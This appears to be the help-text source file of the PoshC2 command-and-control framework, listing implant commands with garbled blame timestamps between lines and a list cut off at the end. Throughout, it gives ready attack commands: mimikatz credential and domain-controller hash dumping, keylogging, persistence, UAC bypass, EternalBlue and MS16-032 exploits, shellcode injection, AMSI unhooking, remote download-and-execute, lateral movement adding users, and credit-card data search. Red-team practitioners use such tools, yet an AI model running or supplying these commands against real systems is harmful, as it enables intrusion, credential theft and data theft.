#!/usr/bin/python
logopic = r"""
|
|
|
|
__________ .__. _________ ________
|
2018-12-27 12:10:46 +00:00
|
|
|
\_______ \____ _____| |__ \_ ___ \ \_____ \\
|
2018-12-20 13:55:03 +00:00
|
|
|
| ___/ _ \/ ___/ | \ / \ \/ / ____/
|
2019-03-12 20:33:45 +00:00
|
|
|
| | ( <_>)___ \| Y \ \ \____/ \\
|
2018-12-27 12:10:46 +00:00
|
|
|
|____| \____/____ >___| / \______ /\_______ \\
|
2018-10-27 18:50:47 +00:00
|
|
|
\/ \/ \/ \/
|
2019-03-10 17:11:22 +00:00
|
|
|
=============== v4.8 www.PoshC2.co.uk =============
|
|
|
|
"""
py_help1 = """
|
|
|
|
Implant Features:
|
|
|
|
=====================
|
|
|
|
ps
|
|
|
|
startanotherimplant or sai
|
|
|
|
startanotherimplant-keepfile
|
|
|
|
beacon 60s / beacon 10m / beacon 2h
|
|
|
|
python print "This is a test"
|
|
|
|
loadmodule
|
|
|
|
loadmoduleforce
|
|
|
|
get-keystrokes
|
|
|
|
upload-file
|
|
|
|
download-file
|
|
|
|
install-persistence
|
|
|
|
remove-persistence
|
|
|
|
get-screenshot
|
|
|
|
setbeacon
|
|
|
|
kill-implant
|
2018-09-04 18:30:59 +00:00
|
|
|
hide-implant
|
|
|
|
unhide-implant
|
2018-09-04 08:46:04 +00:00
|
|
|
help
|
2019-02-12 17:34:21 +00:00
|
|
|
searchhelp persistence
|
2018-09-04 08:46:04 +00:00
|
|
|
back
|
2019-01-01 14:51:57 +00:00
|
|
|
label-implant <newlabel>
|
2019-01-13 16:16:09 +00:00
|
|
|
linuxprivchecker
|
2018-09-04 08:46:04 +00:00
|
|
|
"""
sharp_help1 = """
|
|
|
|
Implant Features:
|
|
|
|
=====================
|
|
|
|
ps
|
|
|
|
beacon 60s / beacon 10m / beacon 2h
|
2018-12-30 23:52:39 +00:00
|
|
|
turtle 60s / turtle 30m / turtle 8h
|
|
|
|
ls c:\\temp\\
|
2018-12-31 00:39:09 +00:00
|
|
|
ls-recurse c:\\temp\\
|
|
|
|
get-content c:\\temp\\log.txt
|
2019-01-06 18:09:07 +00:00
|
|
|
get-userinfo
|
2018-12-27 12:10:46 +00:00
|
|
|
pwd
|
2019-01-02 20:02:03 +00:00
|
|
|
delete c:\\temp\\test.exe
|
|
|
|
move c:\\temp\\old.exe c:\\temp\\new.exe
|
2018-12-30 23:52:39 +00:00
|
|
|
resolveip 127.0.0.1
|
|
|
|
resolvednsname google.com
|
2018-12-28 18:33:43 +00:00
|
|
|
loadmodule Seatbelt.exe
|
2018-12-27 12:10:46 +00:00
|
|
|
loadmoduleforce
|
|
|
|
listmodule
|
2018-12-29 12:37:32 +00:00
|
|
|
modulesloaded
|
2018-12-31 00:14:49 +00:00
|
|
|
run-exe Core.Program Core
|
|
|
|
run-dll Seatbelt.Program Seatbelt UserChecks
|
2018-12-27 12:10:46 +00:00
|
|
|
start-process net -argumentlist users
|
2018-12-31 17:22:58 +00:00
|
|
|
download-file "c:\\temp\\test.exe"
|
|
|
|
upload-file -source /tmp/test.exe -destination "c:\\temp\\test.exe"
|
2018-12-27 12:10:46 +00:00
|
|
|
kill-implant
|
|
|
|
hide-implant
|
|
|
|
unhide-implant
|
|
|
|
help
|
|
|
|
searchhelp listmodules
|
2019-01-01 14:51:57 +00:00
|
|
|
label-implant <newlabel>
|
2018-12-27 12:10:46 +00:00
|
|
|
back
|
2019-02-16 18:59:42 +00:00
|
|
|
safetydump
|
2019-01-03 18:26:06 +00:00
|
|
|
|
|
|
|
Migration
|
|
|
|
===========
|
|
|
|
inject-shellcode c:\\windows\\system32\\svchost.exe <optional-ppid-spoofid>
|
|
|
|
inject-shellcode 1453 <optional-ppid-spoofid>
|
|
|
|
|
|
|
|
Privilege Escalation:
|
|
|
|
=======================
|
|
|
|
arpscan 172.16.0.1/24 true
|
|
|
|
get-serviceperms c:\\temp\\
|
|
|
|
get-screenshot
|
2019-01-04 10:00:46 +00:00
|
|
|
get-screenshotmulti
|
2019-01-03 18:26:06 +00:00
|
|
|
get-keystrokes c:\\temp\\logger.txt
|
|
|
|
stop-keystrokes
|
|
|
|
testadcredential domain username password
|
|
|
|
testlocalcredential username password
|
|
|
|
cred-popper
|
2019-01-05 21:24:21 +00:00
|
|
|
loadmodule SharpUp.exe
|
|
|
|
run-exe SharpUp.Program SharpUp
|
2019-01-03 18:26:06 +00:00
|
|
|
|
|
|
|
Privilege Escalation:
|
|
|
|
=======================
|
2019-01-05 21:24:21 +00:00
|
|
|
loadmodule Seatbelt.exe
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe Seatbelt.Program Seatbelt all
|
|
|
|
run-exe Seatbelt.Program Seatbelt BasicOSInfo
|
|
|
|
run-exe Seatbelt.Program Seatbelt SysmonConfig
|
|
|
|
run-exe Seatbelt.Program Seatbelt PowerShellSettings
|
|
|
|
run-exe Seatbelt.Program Seatbelt RegistryAutoRuns
|
|
|
|
|
2019-02-16 18:59:42 +00:00
|
|
|
Credentials / Tokens / Local Hashes (Must be SYSTEM):
|
|
|
|
=========================================================
|
|
|
|
safetydump
|
|
|
|
safetydump <pid>
|
|
|
|
|
2019-01-03 18:26:06 +00:00
|
|
|
Network Tasks / Lateral Movement:
|
|
|
|
====================================
|
2019-01-05 21:24:21 +00:00
|
|
|
loadmodule Rubeus.exe
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe Rubeus.Program Rubeus kerberoast
|
|
|
|
run-exe Rubeus.Program Rubeus asreproast /user:username
|
|
|
|
|
|
|
|
Network Tasks / Lateral Movement:
|
|
|
|
====================================
|
2019-01-05 21:24:21 +00:00
|
|
|
loadmodule SharpView.exe
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe SharpView.Program SharpView Get-NetUser -SamAccountName ben
|
2019-01-05 21:24:21 +00:00
|
|
|
run-exe SharpView.Program SharpView Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
|
|
|
|
run-exe SharpView.Program SharpView Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe SharpView.Program SharpView Get-NetUser -Name deb -Domain blorebank.local
|
|
|
|
run-exe SharpView.Program SharpView Get-NetSession -Domain blorebank.local
|
|
|
|
run-exe SharpView.Program SharpView Get-DomainController -Domain blorebank.local
|
|
|
|
run-exe SharpView.Program SharpView Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
|
|
|
|
run-exe SharpView.Program SharpView Get-DomainUser -AdminCount -Properties samaccountname
|
|
|
|
run-exe SharpView.Program SharpView Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
|
2019-02-12 17:34:21 +00:00
|
|
|
run-exe SharpView.Program Sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
|
2019-01-03 18:26:06 +00:00
|
|
|
run-exe SharpView.Program SharpView Find-InterestingDomainShareFile -ComputerName SERVER01
|
|
|
|
|
|
|
|
Bloodhound:
|
|
|
|
=============
|
|
|
|
loadmodule SharpHound.exe
|
2019-01-03 22:08:01 +00:00
|
|
|
run-exe Sharphound2.Sharphound Sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
|
2018-12-27 12:10:46 +00:00
|
|
|
"""
posh_help1 = """
|
|
|
|
Implant Features:
|
|
|
|
=====================
|
|
|
|
ps
|
|
|
|
searchhelp mimikatz
|
2019-01-01 14:51:57 +00:00
|
|
|
label-implant <newlabel>
|
2018-11-15 14:11:32 +00:00
|
|
|
get-hash
|
|
|
|
unhidefile
|
|
|
|
hidefile
|
2018-11-19 19:38:53 +00:00
|
|
|
get-ipconfig
|
|
|
|
netstat
|
2018-07-23 08:55:15 +00:00
|
|
|
beacon 60s / beacon 10m / beacon 2h
|
|
|
|
turtle 60s / turtle 30m / turtle 8h
|
|
|
|
kill-implant
|
|
|
|
hide-implant
|
|
|
|
unhide-implant
|
|
|
|
get-proxy
|
|
|
|
get-computerinfo
|
|
|
|
unzip <source file> <destination folder>
|
|
|
|
get-system
|
|
|
|
get-system-withproxy
|
|
|
|
get-system-withdaisy
|
|
|
|
get-implantworkingdirectory
|
|
|
|
get-pid
|
|
|
|
posh-delete c:\\temp\\svc.exe
|
|
|
|
get-webpage http://intranet
|
|
|
|
listmodules
|
|
|
|
modulesloaded
|
|
|
|
loadmodule <modulename>
|
|
|
|
loadmodule inveigh.ps1
|
|
|
|
loadmoduleforce inveigh.ps1
|
|
|
|
get-userinfo
|
|
|
|
invoke-hostenum -all
|
|
|
|
find-allvulns
|
|
|
|
invoke-expression (get-webclient).downloadstring("https://module.ps1")
|
|
|
|
startanotherimplant or sai
|
|
|
|
invoke-daisychain -daisyserver http://192.168.1.1 -port 80 -c2port 80 -c2server http://c2.goog.com -domfront aaa.clou.com -proxyurl http://10.0.0.1:8080 -proxyuser dom\\test -proxypassword pass -localhost (optional if low level user)
|
|
|
|
createproxypayload -user <dom\\user> -pass <pass> -proxyurl <http://10.0.0.1:8080>
|
|
|
|
get-mshotfixes
|
|
|
|
get-firewallrulesall | out-string -width 200
|
|
|
|
enablerdp
|
|
|
|
disablerdp
|
|
|
|
netsh.exe advfirewall firewall add rule name="enablerdp" dir=in action=allow protocol=tcp localport=any enable=yes
|
|
|
|
get-wlanpass
|
|
|
|
get-wmiobject -class win32_product
|
|
|
|
get-creditcarddata -path 'c:\\backup\\'
|
|
|
|
timestomp c:\\windows\\system32\\service.exe "01/03/2008 12:12 pm"
|
|
|
|
icacls c:\\windows\\system32\\resetpassword.exe /grant administrator:f
|
|
|
|
get-allfirewallrules c:\\temp\\rules.csv
|
|
|
|
get-allservices
|
|
|
|
get-wmireglastloggedon
|
|
|
|
get-wmiregcachedrdpconnection
|
|
|
|
get-wmiregmounteddrive
|
|
|
|
resolve-ipaddress
|
|
|
|
unhook-amsi
|
|
|
|
get-process -id $pid -module |%{ if ($_.modulename -eq "amsi.dll") {echo "`nAMSI Loaded`n"} }
|
2018-09-16 15:53:44 +00:00
|
|
|
get-wmiObject -class win32_product
|
2018-07-23 08:55:15 +00:00
|
|
|
"""
posh_help2 = """
|
|
|
|
Privilege Escalation:
|
|
|
|
====================
|
|
|
|
invoke-allchecks
|
2018-12-20 13:55:03 +00:00
|
|
|
Invoke-PsUACme -Payload "c:\\temp\\uac.exe" -method sysprep
|
2018-07-23 08:55:15 +00:00
|
|
|
get-mshotfixes | where-object {$_.hotfixid -eq "kb2852386"}
|
|
|
|
invoke-ms16-032
|
|
|
|
invoke-ms16-032-proxypayload
|
|
|
|
invoke-eternalblue -target 127.0.0.1 -initialgrooms 5 -maxattempts 1 -msfbind
|
|
|
|
get-gpppassword
|
|
|
|
get-content 'c:\\programdata\\mcafee\\common framework\\sitelist.xml'
|
2018-09-26 16:20:58 +00:00
|
|
|
dir -recurse | select-string -pattern 'password='
|
|
|
|
"""
posh_help3 = """
|
|
|
|
File Management:
|
|
|
|
====================
|
|
|
|
download-file -source 'c:\\temp dir\\run.exe'
|
|
|
|
download-files -directory 'c:\\temp dir\\'
|
|
|
|
upload-file -source 'c:\\temp\\run.exe' -destination 'c:\\temp\\test.exe'
|
|
|
|
web-upload-file -from 'http://www.example.com/app.exe' -to 'c:\\temp\\app.exe'
|
|
|
|
|
|
|
|
Persistence:
|
|
|
|
================
|
|
|
|
install-persistence 1,2,3
|
|
|
|
remove-persistence 1,2,3
|
|
|
|
installexe-persistence
|
|
|
|
removeexe-persistence
|
|
|
|
install-servicelevel-persistence | remove-servicelevel-persistence
|
|
|
|
install-servicelevel-persistencewithproxy | remove-servicelevel-persistence
|
2018-09-18 19:56:33 +00:00
|
|
|
invoke-wmievent -name backup -command "powershell -enc abc" -hour 10 -minute 30
|
|
|
|
get-wmievent
|
|
|
|
remove-wmievent -name backup
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
Network Tasks / Lateral Movement:
|
|
|
|
==================
|
|
|
|
get-externalip
|
|
|
|
test-adcredential -domain test -user ben -password password1
|
|
|
|
invoke-smblogin -target 192.168.100.20 -domain testdomain -username test -hash/-password
|
2018-09-18 19:56:33 +00:00
|
|
|
invoke-smbclient -Action Put -source c:\\temp\\test.doc -destination \\test.com\\c$\\temp\\test.doc -hash
|
2018-07-23 08:55:15 +00:00
|
|
|
invoke-smbexec -target 192.168.100.20 -domain testdomain -username test -hash/-pass -command "net user smbexec winter2017 /add"
|
|
|
|
invoke-wmiexec -target 192.168.100.20 -domain testdomain -username test -hash/-pass -command "net user smbexec winter2017 /add"
|
|
|
|
net view | net users | net localgroup administrators | net accounts /dom
|
2018-09-26 16:20:58 +00:00
|
|
|
whoami /groups | whoami /priv
|
|
|
|
"""
posh_help4 = """
|
|
|
|
Active Directory Enumeration:
|
|
|
|
==================
|
|
|
|
invoke-aclscanner
|
2019-01-11 18:07:40 +00:00
|
|
|
invoke-aclscanner | Where-Object {$_.IdentityReference -eq [System.Security.Principal.WindowsIdentity]::GetCurrent().Name}
|
2018-07-23 08:55:15 +00:00
|
|
|
get-objectacl -resolveguids -samaccountname john
|
|
|
|
add-objectacl -targetsamaccountname arobbins -principalsamaccountname harmj0y -rights resetpassword
|
|
|
|
get-netuser -admincount | select samaccountname
|
|
|
|
get-domainuser -uacfilter not_password_expired,not_accountdisable -properties samaccountname,pwdlastset | export-csv act.csv
|
|
|
|
get-netgroup -admincount | select samaccountname
|
|
|
|
get-netgroupmember "domain admins" -recurse|select membername
|
|
|
|
get-netcomputer | select-string -pattern "citrix"
|
|
|
|
get-netcomputer -filter operatingsystem=*7*|select name
|
|
|
|
get-netcomputer -filter operatingsystem=*2008*|select name
|
|
|
|
get-domaincomputer -ldapfilter "(|(operatingsystem=*7*)(operatingsystem=*2008*))" -spn "wsman*" -properties dnshostname,serviceprincipalname,operatingsystem,distinguishedname | fl
|
|
|
|
get-netgroup | select-string -pattern "internet"
|
|
|
|
get-netuser -filter | select-object samaccountname,userprincipalname
|
|
|
|
get-netuser -filter samaccountname=test
|
|
|
|
get-netuser -filter userprinciplename=test@test.com
|
|
|
|
get-netgroup | select samaccountname
|
|
|
|
get-netgroup "*ben*" | select samaccountname
|
|
|
|
get-netgroupmember "domain admins" -recurse|select membername
|
|
|
|
get-netshare hostname
|
|
|
|
invoke-sharefinder -verbose -checkshareaccess
|
|
|
|
new-psdrive -name "p" -psprovider "filesystem" -root "\\\\bloredc1\\netlogon"
|
|
|
|
|
|
|
|
Domain Trusts:
|
|
|
|
==================
|
|
|
|
get-netdomain | get-netdomaincontroller | get-netforestdomain
|
|
|
|
get-netforest | get-netforesttrust
|
|
|
|
invoke-mapdomaintrust
|
|
|
|
get-netuser -domain child.parent.com -filter samaccountname=test
|
2018-09-26 16:20:58 +00:00
|
|
|
get-netgroup -domain child.parent.com | select samaccountname
|
|
|
|
"""
posh_help5 = """
|
|
|
|
Domain / Network Tasks:
|
|
|
|
==================
|
|
|
|
invoke-bloodhound -collectionmethod 'stealth' -csvfolder c:\\temp\\
|
|
|
|
get-netdomaincontroller | select name | get-netsession | select *username,*cname
|
|
|
|
get-dfsshare | get-netsession | select *username,*cname
|
|
|
|
get-netfileserver | get-netsession | select *username,*cname
|
|
|
|
invoke-kerberoast -outputformat hashcat|select-object -expandproperty hash
|
|
|
|
write-scffile -ipaddress 127.0.0.1 -location \\\\localhost\\c$\\temp\\
|
|
|
|
write-inifile -ipaddress 127.0.0.1 -location \\\\localhost\\c$\\temp\\
|
|
|
|
get-netgroup | select-string -pattern "internet"
|
|
|
|
invoke-hostscan -iprangecidr 172.16.0.0/24 (provides list of hosts with 445 open)
|
|
|
|
get-netfileserver -domain testdomain.com
|
|
|
|
find-interestingfile -path \\\\server\\share -officedocs -lastaccesstime (get-date).adddays(-7)
|
|
|
|
brute-ad
|
|
|
|
brute-locadmin -username administrator
|
|
|
|
get-passpol
|
|
|
|
get-passnotexp
|
|
|
|
get-locadm
|
2018-09-16 15:53:44 +00:00
|
|
|
invoke-inveigh -http y -proxy y -nbns y -tool 1 -StartupChecks y
|
2018-07-23 08:55:15 +00:00
|
|
|
get-inveigh | stop-inveigh (gets output from inveigh thread)
|
|
|
|
invoke-sniffer -outputfile c:\\temp\\output.txt -maxsize 50mb -localip 10.10.10.10
|
|
|
|
invoke-sqlquery -sqlserver 10.0.0.1 -user sa -pass sa -query 'select @@version'
|
|
|
|
invoke-runas -user <user> -password '<pass>' -domain <dom> -command c:\\windows\\system32\\cmd.exe -args " /c calc.exe"
|
|
|
|
invoke-pipekat -target <ip-optional> -domain <dom> -username <user> -password '<pass>' -hash <hash-optional>
|
2018-09-26 16:20:58 +00:00
|
|
|
invoke-wmiexec -target <ip> -domain <dom> -username <user> -password '<pass>' -hash <hash-optional> -command <cmd>
|
|
|
|
"""
posh_help6 = """
|
|
|
|
Lateral Movement:
|
|
|
|
=========================================================
|
|
|
|
invoke-runaspayload -user <user> -password '<pass>' -domain <dom>
|
|
|
|
invoke-runasproxypayload -user <user> -password '<pass>' -domain <dom>
|
|
|
|
invoke-runasdaisypayload -user <user> -password '<pass>' -domain <dom>
|
|
|
|
invoke-dcompayload -target <ip>
|
|
|
|
invoke-dcomproxypayload -target <ip>
|
|
|
|
invoke-dcomdaisypayload -target <ip>
|
|
|
|
invoke-psexecpayload -target <ip> -domain <dom> -user <user> -pass '<pass>' -hash <hash-optional>
|
|
|
|
invoke-psexecproxypayload -target <ip> -domain <dom> -user <user> -pass '<pass>' -hash <hash-optional>
|
|
|
|
invoke-psexecdaisypayload -target <ip> -domain <dom> -user <user> -pass '<pass>' -hash <hash-optional>
|
|
|
|
invoke-wmipayload -target <ip> -domain <dom> -username <user> -password '<pass>' -hash <hash-optional>
|
|
|
|
invoke-wmiproxypayload -target <ip> -domain <dom> -user <user> -pass '<pass>' -hash <hash-optional>
|
|
|
|
invoke-wmidaisypayload -target <ip> -domain <dom> -user <user> -pass '<pass>'
|
2018-09-26 16:20:58 +00:00
|
|
|
invoke-winrmsession -ipaddress <ip> -user <dom\\user> -pass <pass>
|
|
|
|
"""
posh_help7 = """
|
|
|
|
Credentials / Tokens / Local Hashes (Must be SYSTEM):
|
|
|
|
=========================================================
|
|
|
|
invoke-mimikatz -command '"sekurlsa::logonpasswords"'
|
|
|
|
invoke-mimikatz -command '"lsadump::sam"'
|
|
|
|
invoke-mimikatz -command '"lsadump::lsa"'
|
|
|
|
invoke-mimikatz -command '"lsadump::cache"'
|
|
|
|
invoke-mimikatz -command '"lsadump::secrets"'
|
|
|
|
invoke-mimikatz -command '"ts::multirdp"'
|
|
|
|
invoke-mimikatz -command '"privilege::debug"'
|
|
|
|
invoke-mimikatz -command '"crypto::capi"'
|
|
|
|
invoke-mimikatz -command '"crypto::certificates /export"'
|
|
|
|
invoke-mimikatz -command '"sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<hash> /run:c:\\temp\\run.bat"'
|
|
|
|
invoke-tokenmanipulation | select-object domain, username, processid, iselevated, tokentype | ft -autosize | out-string
|
|
|
|
invoke-tokenmanipulation -impersonateuser -username "domain\\user"
|
2018-09-25 22:05:19 +00:00
|
|
|
get-lapspasswords
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
Credentials / Domain Controller Hashes:
|
|
|
|
============================================
|
|
|
|
invoke-mimikatz -command '"lsadump::dcsync /domain:domain.local /user:administrator"'
|
|
|
|
invoke-dcsync -pwdumpformat
|
2018-09-26 16:20:58 +00:00
|
|
|
dump-ntds -emptyfolder <emptyfolderpath>
|
|
|
|
"""
posh_help8 = """
|
|
|
|
Useful Modules:
|
|
|
|
====================
|
|
|
|
get-screenshot
|
|
|
|
get-screenshotallwindows
|
|
|
|
get-screenshotmulti -timedelay 120 -quantity 30
|
|
|
|
get-recentfiles
|
|
|
|
cred-popper
|
|
|
|
get-clipboard
|
|
|
|
hashdump
|
2019-02-12 19:45:33 +00:00
|
|
|
get-keystrokes | get-keystrokedata
|
2018-07-23 08:55:15 +00:00
|
|
|
arpscan -ipcidr 10.0.0.1/24
|
|
|
|
portscan -ipaddress 10.0.0.1-50 -ports "1-65535" -maxqueriesps 10000 -delay 0
|
|
|
|
((new-object Net.Sockets.TcpClient).connect("10.0.0.1",445))
|
2019-02-12 19:45:33 +00:00
|
|
|
get-netstat | %{"$($_.Protocol) $($_.LocalAddress):$($_.LocalPort) $($_.RemoteAddress):$($_.RemotePort) $($_.State) $($_.ProcessName)($($_.PID))"}
|
2018-11-19 19:38:53 +00:00
|
|
|
1..254 | %{ try {[System.Net.Dns]::GetHostEntry("10.0.0.$_") } catch {} }|select hostname
|
2018-07-23 08:55:15 +00:00
|
|
|
migrate
|
|
|
|
migrate -procid 4444
|
|
|
|
migrate -procpath c:\\windows\\system32\\searchprotocolhost.exe -suspended -RtlCreateUserThread
|
|
|
|
migrate -procpath c:\\windows\\system32\\svchost.exe -suspended
|
|
|
|
inject-shellcode -x86 -shellcode (gc c:\\temp\\shellcode.bin -encoding byte) -procid 5634
|
|
|
|
get-eventlog -newest 10000 -instanceid 4624 -logname security | select message -expandproperty message | select-string -pattern "user1|user2|user3"
|
|
|
|
send-mailmessage -to "itdept@test.com" -from "user01 <user01@example.com>" -subject <> -smtpserver <> -attachment <>
|
|
|
|
sharpsocks -uri http://www.c2.com:9090 -beacon 2000 -insecure
|
2019-02-12 17:34:21 +00:00
|
|
|
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow program="C:\\windows\\system32\\svchost.exe" protocol=TCP localport=80 profile=Domain
|
2018-07-23 08:55:15 +00:00
|
|
|
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);$socket.start();
|
|
|
|
reversedns 10.0.0.1
|
2018-09-16 15:53:44 +00:00
|
|
|
[System.Net.Dns]::GetHostbyAddress("10.0.0.1")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
Implant Handler:
|
|
|
|
=====================
|
|
|
|
searchhelp
|
|
|
|
back
|
|
|
|
quit
|
|
|
|
exit
|
|
|
|
"""
pre_help = """
|
2018-12-20 13:55:03 +00:00
|
|
|
Main Menu:
|
2018-07-23 08:55:15 +00:00
|
|
|
================================
|
|
|
|
use implant by <id>, e.g. 1
|
|
|
|
use multiple implants by <id>,<id>,<id>, e.g. 1,2,5
|
|
|
|
use implant by range, e.g. 40-45
|
|
|
|
use all implants by all
|
|
|
|
|
2018-12-20 13:55:03 +00:00
|
|
|
Auto-Runs:
|
2018-07-23 08:55:15 +00:00
|
|
|
=====================
|
|
|
|
add-autorun <task>
|
|
|
|
list-autorun (alias: l)
|
|
|
|
del-autorun <taskid>
|
|
|
|
nuke-autorun
|
|
|
|
automigrate-frompowershell (alias: am)
|
|
|
|
|
2018-12-20 13:55:03 +00:00
|
|
|
Server Commands:
|
2018-07-23 08:55:15 +00:00
|
|
|
=====================
|
|
|
|
tasks
|
|
|
|
opsec
|
2018-10-10 07:16:32 +00:00
|
|
|
show-urls
|
|
|
|
list-urls
|
2018-07-23 08:55:15 +00:00
|
|
|
cleartasks
|
2018-12-20 13:55:03 +00:00
|
|
|
show-serverinfo
|
2018-07-23 08:55:15 +00:00
|
|
|
history
|
|
|
|
output-to-html
|
|
|
|
set-clockworksmsapikey df2
|
|
|
|
set-clockworksmsnumber 44789
|
|
|
|
set-defaultbeacon 60
|
2018-09-07 11:03:57 +00:00
|
|
|
turnon-notifications
|
|
|
|
turnoff-notifications
|
2018-12-20 13:55:03 +00:00
|
|
|
listmodules
|
2018-07-23 08:55:15 +00:00
|
|
|
pwnself (alias: p)
|
2018-12-20 13:55:03 +00:00
|
|
|
creds -action <dump/add/del/search> -username <username> -password/-hash
|
2018-07-23 08:55:15 +00:00
|
|
|
createnewpayload
|
2018-12-20 13:55:03 +00:00
|
|
|
createproxypayload
|
2018-07-23 08:55:15 +00:00
|
|
|
createdaisypayload
|
2018-12-20 13:55:03 +00:00
|
|
|
quit
|
2018-07-23 08:55:15 +00:00
|
|
|
"""
# Full PowerShell implant help: the eight parts above, in order, with no
# separator (each part already begins and ends with a newline).
posh_help = "".join((
    posh_help1, posh_help2, posh_help3, posh_help4,
    posh_help5, posh_help6, posh_help7, posh_help8,
))
# pre help commands
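# Commands accepted at the main (pre-implant) prompt; keep in step with the
# "Auto-Runs" and "Server Commands" sections of pre_help above.
# Fix: 'listmodules' was listed twice; the duplicate is dropped so the list
# has one entry per command (order of first appearance is unchanged).
# NOTE(review): 'quit' appears in pre_help but not here — presumably handled
# by the prompt loop itself; confirm before relying on this list for it.
PRECOMMANDS = [
    # URL and auto-run management
    'list-urls', 'show-urls', 'add-autorun', 'list-autorun', 'del-autorun',
    'nuke-autorun', 'automigrate-frompowershell',
    # server state and settings
    'show-serverinfo', 'history', 'output-to-html', 'set-clockworksmsapikey',
    'set-clockworksmsnumber', 'set-defaultbeacon',
    # modules, stored credentials and payload generation
    'listmodules', 'pwnself', 'creds', 'createnewpayload', 'createproxypayload',
    'createdaisypayload', 'turnoff-notifications', 'turnon-notifications',
    'tasks', 'cleartasks', 'opsec',
]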
# post help commands powershell implant
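# Commands accepted inside a PowerShell implant session (posh_help1..8).
# Fix: "get-idletime" was listed twice; the second occurrence is dropped so
# every entry is unique (order of first appearance is unchanged).
# NOTE(review): the help text documents `get-netforestdomain` but this list
# carries `get-forestdomain`; which name the handler really accepts is not
# visible here — confirm and align the help text.
COMMANDS = [
    'loadmodule', "bloodhound", "brute-ad", "brute-locadmin",
    "bypass-uac", "cve-2016-9192", "convertto-shellcode", "decrypt-rdcman", "dump-ntds", "get-computerinfo", "get-creditcarddata", "get-gppautologon",
    "get-gpppassword", "get-idletime", "get-keystrokes", "get-locadm", "get-mshotfixes", "get-netstat", "get-passnotexp", "get-passpol", "get-recentfiles",
    "get-serviceperms", "get-userinfo", "get-wlanpass", "invoke-hostenum", "inject-shellcode", "inveigh-relay", "inveigh", "invoke-arpscan", "arpscan",
    "invoke-dcsync", "invoke-eventvwrbypass", "invoke-hostscan", "invoke-ms16-032-proxy", "invoke-ms16-032", "invoke-mimikatz", "invoke-psinject",
    "invoke-pipekat", "invoke-portscan", "invoke-powerdump", "invoke-psexec", "invoke-reflectivepeinjection", "invoke-reversednslookup",
    "invoke-runas", "invoke-smbexec", "invoke-shellcode", "invoke-sniffer", "invoke-sqlquery", "invoke-tater", "invoke-thehash",
    "invoke-tokenmanipulation", "invoke-wmichecker", "invoke-wmicommand", "invoke-wmiexec", "invoke-wscriptbypassuac", "invoke-winrmsession",
    "out-minidump", "portscan", "invoke-allchecks", "set-lhstokenprivilege", "sharpsocks", "find-allvulns", "test-adcredential", "new-zipfile",
    "get-netuser", "sleep", "beacon", "setbeacon", "get-screenshot", "install-persistence", "hide-implant", "unhide-implant", "kill-implant", "invoke-runasdaisypayload",
    "invoke-runasproxypayload", "invoke-runaspayload", "migrate", "$psversiontable", "back", "clear", "invoke-daisychain", "stop-daisy",
    "ipconfig", "upload-file", "download-file", "download-files", "history", "get-help", "stopsocks", "get-screenshotallwindows",
    "hashdump", "cred-popper", "help", "whoami", "createnewpayload", "createproxypayload", "createdaisypayload", "get-proxy", "restart-computer",
    "turtle", "posh-delete", "get-psdrive", "get-netcomputer", "get-netdomain", "get-netforest", "get-netforesttrust",
    "get-forestdomain", "test-connection", "get-netdomaincontroller", "invoke-pbind", "pbind-command", "invoke-kerberoast", "invoke-userhunter",
    "get-process", "start-process", "searchhelp", "get-netshare", "pbind-kill", "install-servicelevel-persistencewithproxy",
    "install-servicelevel-persistence", "remove-servicelevel-persistence", "reversedns", "invoke-eternalblue", "loadmoduleforce", "unhook-amsi",
    "get-implantworkingdirectory", "get-system", "get-system-withproxy", "get-system-withdaisy", "get-pid", "listmodules", "modulesloaded",
    "startanotherimplant", "remove-persistence", "removeexe-persistence", "installexe-persistence", "get-hash", "get-creds", "resolve-ipaddress",
    "invoke-wmievent", "remove-wmievent", "get-wmievent", "invoke-smbclient", "get-keystrokedata", "unhidefile", "hidefile", "label-implant",
    'invoke-psexecpayload', 'invoke-wmipayload', 'invoke-dcompayload', 'invoke-psexecproxypayload', 'invoke-wmiproxypayload',
    'invoke-dcomproxypayload', 'invoke-psexecdaisypayload', 'invoke-wmidaisypayload', 'invoke-dcomdaisypayload',
]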
# post help commands python implant
# Commands accepted inside a Python implant session (see py_help1 above).
# Order is kept exactly as originally declared; the comments only group the
# entries for reading. `pwd` and `id` are accepted here but are not shown
# in py_help1.
UXCOMMANDS = [
    # session control
    "label-implant",
    "unhide-implant",
    "hide-implant",
    "help",
    "searchhelp",
    "python",
    "loadmodule",
    "loadmoduleforce",
    "get-keystrokes",
    "back",
    # file transfer and persistence
    "upload-file",
    "download-file",
    "install-persistence",
    "remove-persistence",
    # spawning further implants
    "sai",
    "startanotherimplant-keepfile",
    "get-screenshot",
    "startanotherimplant",
    # host queries and beaconing
    "pwd",
    "id",
    "ps",
    "setbeacon",
    "kill-implant",
    "linuxprivchecker",
]
# post help commands sharp implant
# Commands accepted inside a C# ("sharp") implant session (see sharp_help1
# above). Order is kept exactly as originally declared; the comments only
# group the entries for reading. Note `listmodules` here versus
# `listmodule` in sharp_help1.
SHARPCOMMANDS = [
    # user, keystrokes and filesystem
    "get-userinfo", "stop-keystrokes", "get-keystrokes", "delete", "move",
    "label-implant", "upload-file", "download-file", "get-content",
    "ls-recurse", "turtle",
    # credentials and name resolution
    "cred-popper", "resolveip", "resolvednsname", "testadcredential",
    "testlocalcredential",
    # screenshots, modules, services, visibility
    "get-screenshot", "modulesloaded", "get-serviceperms", "unhide-implant",
    "arpscan", "ls", "pwd", "dir",
    # execution and injection
    "inject-shellcode", "start-process", "run-exe", "run-dll", "hide-implant",
    "help", "searchhelp", "listmodules", "loadmodule", "loadmoduleforce",
    # session control
